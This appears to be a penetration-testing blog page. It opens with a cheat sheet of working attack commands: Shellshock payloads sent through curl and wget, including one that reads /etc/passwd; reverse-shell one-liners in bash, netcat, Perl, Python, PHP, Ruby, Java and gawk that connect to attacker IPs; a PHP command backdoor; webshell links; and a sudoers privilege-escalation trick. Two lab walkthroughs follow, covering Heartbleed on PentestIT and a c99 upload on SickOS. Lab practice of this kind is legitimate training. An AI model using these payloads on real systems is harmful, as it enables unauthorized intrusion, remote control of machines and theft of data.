Pentest Killer Commands

Cheat Sheets

Vulnerability assesment

Scanning a webapplication with nikto with proxy configuration.

nikto -host 192.168.xx.xx -userproxy http://192.168.xx.xx:3129

 

Directory Buster with Proxy

Dirb http://192.168.XX.XX -p 192.168.XX.XX:3129

WPScan With Proxy

wpscan --url 192.168.XX.XX/dir -proxy 192.168.XX.XX:3128

Curl Commands

Browsing the web page with proxy:

  1. curl 192.168.XX.XX/robots.txt -x 192.168.XX.XX:3128
  2. curl --proxy 192.168.37.129:3128 http://192.168.37.129:80/robots.txt

 

Browse with verbose move:

 curl -v 192.168.37.129 --proxy 192.168.37.129:3128

 

Shell shock exploitation with curl:

curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status

 

Example:

curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status
curl -x http://192.168.37.129:3128 -A "() { :; };/bin/sh -i >& /dev/tcp/192.168.32.41/443 0>&1" http://192.168.37.129/cgi-bin/status

 

Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

Shellshock exploitation with wget

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

Spawn Shell

Spawn Python TTY Shell :

python -c 'import pty; pty.spawn("/bin/bash")'

 

Spawn Interactive sh shell :

/bin/sh -i

 

Spawn Perl TTY Shell :

exec "/bin/sh"; 

perl e 'exec "/bin/sh";'

 

Spawn Ruby TTY Shell :

exec "/bin/sh"

 

Spawn Shell with vi editor :

:!bash

 

Spawn TTY shell Nmap

!sh

 

Reverse Shells

Kali Webshell directory:

root@kali:/usr/share/webshells# ls -ltr
total 0
drwxr-xr-x 2 root root 183 Jan 20 2016 php
drwxr-xr-x 2 root root 63 Jan 20 2016 perl
drwxr-xr-x 2 root root 33 Jan 20 2016 cfm
drwxr-xr-x 2 root root 34 Jan 20 2016 aspx
drwxr-xr-x 2 root root 56 Jan 20 2016 asp
drwxr-xr-x 1 root root 40 Feb 8 09:44 jsp
root@kali:/usr/share/webshells#

 

Bash:

  1. bash -i > /dev/tcp/ATTSCKERS_IP/port 0>&1
  2. exec /bin/bash 0&0 2>&0
  3. 0<&196;exec 196<>/dev/tcp/ATTACKERS_IP/80; sh <&196 >&196 2>&196
  4. exec 5<>/dev/tcp/ATTACKERS_IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  5. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.156.130 445 >/tmp/f

 

Example:

bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"
http://192.168.XX.XX:8080/?page=1&rcmd=bash -c "bash -i >& /dev/tcp/ATTACKERS_IP/31337 0>&1"

 

PHP:

php -r '$sock=fsockopen("ATTACKERS_IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Note: TCP uses file descriptor 3. Replace 3 with 4, 5, or 6 if it doesn’t work

 

Netcat:

  1. nc -e /bin/sh ATTACKERS_IP Port
  2. /bin/sh | nc ATTACKERS_IP Port
  3. rm -f /tmp/p; mknod /tmp/p p && nc ATTACKERS_IP 4444 0/tmp/p

 

Example:

nc -e /bin/sh 192.168.37.122 4444

 

Telnet:

  1. rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
  2. telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

 

Example:

telnet 192.168.37.130 80 | /bin/bash | telnet 192.168.37.130 443

 

Perl:

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Example:

perl -e 'use Socket;$i="192.168.1.XX";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Perl Windows:

  1. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  2. perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Ruby:

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Java:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

 

Example:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Python Reverse Shell URL encode format:

python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.110.50%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

 

Example:

http://192.168.XX.XX:port/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Gawk:

#!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } }

 

Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

 

Building a exploit

Cross compile 32 bit binary on 64 bit Linux:

gcc -m32 exploit.c -o exploit

 

Cross compile 32 windows .exe on Linux:

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

 

Shell Shock

() { ignored;};/bin/bash -i >& /dev/tcp/192.168.221.139/443 0>&1

 

Backdoors

PHP:

<?php system($_REQUEST[cmd]); ?>

Shells

DAws.php:

https://github.com/dotcppfile/DAws/blob/master/DAws.php

 

c99:

https://github.com/tennc/webshell/blob/master/php/PHPshell/c99shell/c99shell.php

 

b374k shell 3.2

https://github.com/b374k/b374k

 

Privilege escalation 

Cron job update

echo 'chmod 777 /etc/sudoers && echo "<user name (LOW priv)> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /dir/<cronfile to run>

 

Reference Sites for enumeration 

http://www.speedguide.net/port.php?port=8080
https://www.youtube.com/user/myexploit2600
https://myexploit.wordpress.com/port-number-exploits/
https://docs.google.com/uc?export=download&confirm=wKvF&id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU
https://myexploit.wordpress.com/control-metasploit-post-exploits/
http://www.bekkoame.ne.jp/~s_ita/port/port1-99.html
http://www.speedguide.net/ports_sg.php
https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/

http://www.vulnerabilityassessment.co.uk/nfs.htm

https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/

https://www.pentestpartners.com/blog/using-nfsshell-to-compromise-older-environments/

 

Reference Links for LFI:

https://highon.coffee/blog/lfi-cheat-sheet/

 

IP Tables Rules:

https://www.suse.com/communities/blog/basic-iptables-tutorial/

 

 

Reference Links:

 

 

PentestIT Test lab v.9

PentestIT Test lab v.9

 

Penetration testing laboratories “Test lab” emulate an IT infrastructure of real companies and created for a legal pentesting and improving penetration testing skills. Laboratories are always unique and contain the most recent and known vulnerabilities.

Test lab v.9 is a professional software development company, engaged in the development of various information security systems and applications, so CyBear 32C* is well protected against hacker attacks. For compromise CyBear 32C*’s corporate network attackers needs a good penetration testing skills.

Network diagram

https://lab.pentestit.ru/images/labs/TL9_map.png

To access the Internal network first we have to bypass the gateway 192.168.101.8

Nmap Scan out put

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-28 06:37 EDT
Nmap scan report for cybear32c.lab (192.168.101.8)
Host is up (0.18s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
25/tcp   open  smtp       Postfix smtpd
80/tcp   open  http       nginx 1.10.0
443/tcp  open  http       nginx 1.8.1
3128/tcp open  http-proxy Squid http proxy 3.4.8
8100/tcp open  http       nginx
Service Info: Host: -mail.cybear32c.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 and 443 is not accessible with browser. and with port 8100 I could access the roundcube mail application. I tried to enumerate the application using “dirb” but not found interesting. It seems port 80 and 443 are protected by WAF. When I try  to access the port 80 every time I am getting error message. So I have added DNS name with IP in /etc/host file and then reloaded the page. It lands me correct page, tried same dirb on 80 port. Nothing has given correct information. At last try I enumerated the port 443 and noticed interesting 😉 HeartBleed vulnerability.

nmap -sV --script=ssl-heartbleed 192.168.101.8

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-28 06:58 EDT
Nmap scan report for cybear32c.lab (192.168.101.8)
Host is up (0.17s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
25/tcp   open  smtp       Postfix smtpd
80/tcp   open  http       nginx 1.10.0
443/tcp  open  http       nginx 1.8.1
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL 
|   cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt 
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_      http://cvedetails.com/cve/2014-0160/
3128/tcp open  http-proxy Squid http proxy 3.4.8
8100/tcp open  http       nginx
Service Info: Host: -mail.cybear32c.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploited the HeartBleed vulnerability usign metasploit auxiliary module “auxiliary/scanner/ssl/openssl_heartbleed “.

After exploiting the multiple time I got the inserting /var/www path. Using the same path I navigated the page and got the BYPASS token.

SickOS 1.1 Walkthrough

SickOS 1.1 Walkthrough

Attacking Machine : Linux kali 4.3.0-kali1-amd64

Vulnerabile Mahine: SickOS1.1

Download:

Scanning

Started scan with netdiscover command for live host in my network.

We could see three IPs are detected by netdiscover including gateway and default address.

So our target would be 192.168.37.129.

Enumeration:

Run the nmap to detect what are the services running on the machine.

nmap -sS -sV -T4 -A 192.168.37.129

Nmap scan returns ssh and proxy port information.

 By looking into port 3128 we know that a webserver is running and it can be accessible with port proxy.

Configure the local browser proxy to access the web page.

We are all set to access the webapplication. Now run the nikto to detect whether any vulnerabilities present on this application or not.

nikto -h http://192.168.37.129:3128 -o out -F html

We found that rebotx.txt is present and found Wolfcms directory is present.

Navigate to wolfcms directory, it landed to Wolf cms application.

By doing some research on the web I found the admin page location for cms application and default user name and password.

With default user name and password I could able to login to administrator account for Wolf application. By visiting the files tab in the application “Upload file” function is available in public directory to upload any file.

I have created c99 shell in attacking machine and uploaded with “Upload file” option.

To launch the shell, navigate to public directory and launch the shell.php which returns web shell.

Using web shell we can list the directories and navigate the directories. When I navigate one directory up I found config file.

Config file disclose the root password for mysql. I have navigated to etc directory and found passwd text in read permissions. This file can be downloaded with web shell.

By analyzing the password we know that “sickos” is one of valid use with bash shell.

I tried to login sickos user with password found in the config file and succeeded.

Pivilage excalation:

Having a limited user access I have ran the sudo -l command to know what are the other commands sickos user can run.

Interestingly sickos user can run all commands 🙂

Connect the root user with sudo -s and I have loged to root user account without a password.